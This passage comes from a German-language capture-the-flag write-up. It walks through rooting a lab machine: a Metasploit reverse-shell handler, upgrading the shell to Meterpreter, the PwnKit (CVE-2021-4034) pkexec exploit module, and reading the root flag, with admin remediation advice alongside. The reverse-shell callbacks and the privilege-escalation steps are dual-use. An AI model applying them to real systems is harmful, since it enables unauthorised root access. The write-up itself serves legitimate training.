**Empfehlung (Pentester):** 1. Prüfen Sie die Version von `pkexec` oder versuchen Sie direkt den PwnKit-Exploit (z.B. über Metasploit oder ein eigenständiges Exploit-Skript). 2. Untersuchen Sie die Möglichkeit, SUID `wget` auszunutzen (siehe GTFOBins). 3. Versuchen Sie, zu `raj` zu wechseln, um `sudo -l` auszuführen.
**Empfehlung (Admin):** 1. Patchen Sie das System, um PwnKit (CVE-2021-4034) zu beheben (Update für `policykit-1`). 2. Entfernen Sie das SUID-Bit von `wget` (`chmod u-s /usr/bin/wget`). 3. Überprüfen Sie `sudo`-Konfigurationen.

Privilege Escalation (PwnKit via Metasploit)

Die lokale Enumeration hat das SUID-Root-Binary `/usr/bin/pkexec` aufgedeckt, das für die PwnKit-Schwachstelle (CVE-2021-4034) anfällig sein könnte. Wir verwenden Metasploit, um diesen Exploit auszuführen und Root-Rechte zu erlangen.

msf6 >

[*] Using configured payload generic/shell_reverse_tcp

lhost => eth0

lport => 4455

[*] Started reverse TCP handler on 192.168.2.199:4455
                    

rm: cannot remove '/tmp/f': No such file or directory

**Analyse:** Der Pentester startet Metasploit (`msfconsole -q`) und konfiguriert einen generischen Handler (`multi/handler`) auf Port 4455. Dies dient wahrscheinlich dazu, die Verbindung der späteren Meterpreter-Payload vom PwnKit-Exploit aufzufangen. Der zweite Code-Block zeigt einen fehlerhaften Versuch, eine Netcat-Reverse-Shell von der `www-data`-Shell zu starten (der Befehl ist unvollständig und syntaktisch falsch), was mit einem `rm`-Fehler quittiert wird. Dieser Block scheint für den weiteren Metasploit-Workflow irrelevant zu sein und könnte ein Überbleibsel sein.

**Bewertung:** Vorbereitung für den Empfang einer Shell in Metasploit. Der fehlgeschlagene `nc`-Versuch ist irrelevant für den PwnKit-Exploit.

**Empfehlung (Pentester):** Ignorieren Sie den fehlgeschlagenen `nc`-Versuch. Verwenden Sie Metasploit, um die bestehende `www-data`-Shell (die über Port 4444 lief) zu einer Meterpreter-Session aufzuwerten, und führen Sie dann den PwnKit-Exploit aus.
**Empfehlung (Admin):** Netzwerk-Monitoring und Intrusion Detection Systeme können helfen, Metasploit-Aktivitäten zu erkennen.

lport => 4433

session => 1

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.199:4433
[*] Sending stage (1017704 bytes) to 192.168.2.141
[*] Meterpreter session 2 opened (192.168.2.199:4433 -> 192.168.2.141:37762) at 2023-10-04 00:09:19 +0200
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
                    

**Analyse:** Der Pentester verwendet das Metasploit-Post-Exploitation-Modul `shell_to_meterpreter`, um die bestehende einfache Reverse Shell (angenommen als Session 1) in eine funktionsreichere Meterpreter-Session aufzuwerten. * `set lport 4433`: Konfiguriert einen neuen Port für die Meterpreter-Verbindung. * `set session 1`: Gibt die zu aktualisierende Shell-Session an. * `run`: Führt das Modul aus. Es startet einen neuen Handler, sendet die Meterpreter-Payload an das Ziel und meldet erfolgreich das Öffnen von Meterpreter-Session 2.

**Bewertung:** Die einfache Shell wurde erfolgreich zu einer Meterpreter-Session aufgewertet. Dies erleichtert die weitere Interaktion mit dem Zielsystem und die Ausführung von Exploits.

**Empfehlung (Pentester):** Nutzen Sie nun Meterpreter-Session 2 als Basis für den PwnKit-Exploit.
**Empfehlung (Admin):** Intrusion Detection/Prevention Systeme (IDS/IPS) können versuchen, Meterpreter-Payloads und -Kommunikation zu erkennen und zu blockieren.

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  auxiliary/scanner/http/dolibarr_16_contact_dump      2023-03-14       normal     Yes    Dolibarr 16 pre-auth contact database dump
   1  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec  2022-01-25       excellent  Yes    Local Privilege Escalation in polkits pkexec
   2  exploit/windows/local/ms18_8120_win32k_privesc       2018-05-09       good       No     Windows SetImeInfoEx Win32k NULL Pointer Dereference
                    

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp

session => 2

lport => 4545

[*] Started reverse TCP handler on 192.168.2.199:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.wgfosossd
[+] The target is vulnerable.
[*] Writing '/tmp/.zrukxtu/gzuflut/gzuflut.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.zrukxtu
[*] Sending stage (3045380 bytes) to 192.168.2.141
[+] Deleted /tmp/.zrukxtu/gzuflut/gzuflut.so
[+] Deleted /tmp/.zrukxtu/.fvqzdobogqe
[+] Deleted /tmp/.zrukxtu
[*] Meterpreter session 3 opened (192.168.2.199:4545 -> 192.168.2.141:33094) at 2023-10-04 00:10:14 +0200
                    

**Analyse:** Der Pentester sucht in Metasploit nach dem PwnKit-Exploit (`search 4034`) und wählt das Modul `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec`. * Er setzt die `session` auf die zuvor erstellte Meterpreter-Session 2 (die als `www-data` läuft). * Er setzt `lport` auf 4545 für die neue Root-Meterpreter-Verbindung. * `run` führt den Exploit aus. Metasploit prüft die Anfälligkeit (`[+] The target is vulnerable.`), lädt notwendige Dateien hoch (`Writing ...`), führt den Exploit aus, bereinigt die temporären Dateien und meldet erfolgreich das Öffnen einer neuen Meterpreter-Session (Session 3).

**Bewertung:** Root-Zugriff erfolgreich über PwnKit erlangt! Die Ausnutzung der Schwachstelle in `pkexec` mittels Metasploit war erfolgreich und liefert eine Root-Meterpreter-Session.

**Empfehlung (Pentester):** Interagieren Sie mit Meterpreter-Session 3. Verwenden Sie `getuid`, um die Root-Rechte zu bestätigen, und wechseln Sie dann mit `shell` zu einer interaktiven Root-Shell, um die Flagge zu suchen.
**Empfehlung (Admin):** Patchen Sie die PwnKit-Schwachstelle (CVE-2021-4034) durch Aktualisierung des `policykit-1`-Pakets. Überwachen Sie das System auf die Erstellung verdächtiger Dateien in `/tmp` und auf die Ausführung von `pkexec`.

Proof of Concept (Root Shell)

Nach der erfolgreichen Ausführung des PwnKit-Exploits über Metasploit haben wir eine Meterpreter-Session mit Root-Rechten erhalten. Wir bestätigen dies und wechseln zu einer interaktiven Shell, um die finale Flagge zu finden.

Server username: root

Process 2452 created.
Channel 1 created.
                    

proof.txt

_________________________________________________________________________
 _____     _   _   U _____ u     U _____ u   _   _       ____     	|
 |_ " _|   |'| |'|  \| ___"|/     \| ___"|/  | \ |"|     |  _"\   	|
   | |    /| |_| |\  |  _|"        |  _|"   <|  \| |>   /| | | |  	|
  /| |\   U|  _  |u  | |___        | |___   U| |\  |u   U| |_| |\ 	|
 u |_|U    |_| |_|   |_____|       |_____|   |_| \_|     |____/ u 	|
 _// \\_   //   \\   <<   >>       <<   >>   ||   \\,-.   |||_    	|
(__) (__) (_") ("_) (__) (__)     (__) (__)  (_")  (_/   (__)_)   	|
									|
									|
!! Congrats you have finished this task !!				|
									|
Contact us here:							|
									|
Hacking Articles : https://twitter.com/rajchandel/			|
									|
									|
+-+-+-+-+-+ +-+-+-+-+-+-+-+						|
 |E|n|j|o|y| |H|A|C|K|I|N|G|						|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+						|
________________________________________________________________________|
                    

**Analyse:** In der Meterpreter-Session 3 wird `getuid` ausgeführt, was "Server username: root" zurückgibt und die Root-Rechte bestätigt. Mit `shell` wird eine interaktive System-Shell geöffnet. Der Pentester wechselt in das Root-Home-Verzeichnis (`cd ~` als root führt zu `/root`) und listet den Inhalt auf (`ls`), wobei `proof.txt` gefunden wird. `cat proof.txt` zeigt den Inhalt der Datei an, der eine Erfolgsnachricht und ASCII-Art enthält.

**Bewertung:** Ziel erreicht! Die Root-Flagge (in Form der Datei `proof.txt` und deren Inhalt) wurde erfolgreich erlangt. Der Penetrationstest ist abgeschlossen.

**Empfehlung (Pentester):** Dokumentieren Sie die Flagge und fassen Sie den Angriffspfad (WordPress Plugin Exploit -> Reverse Shell -> PwnKit Exploit) zusammen.
**Empfehlung (Admin):** Beheben Sie die gefundenen Schwachstellen (Reflex Gallery Plugin, PwnKit/pkexec). Überprüfen Sie die Systemsicherheit umfassend, da Root-Zugriff erlangt wurde.

  Privilege Escalation erfolgreich
                    

**Analyse:** Organisatorische Abschlussnotiz.

**Bewertung:** Bestätigt den Abschluss der Eskalation.

**Empfehlung (Pentester/Admin):** Keine technischen Empfehlungen.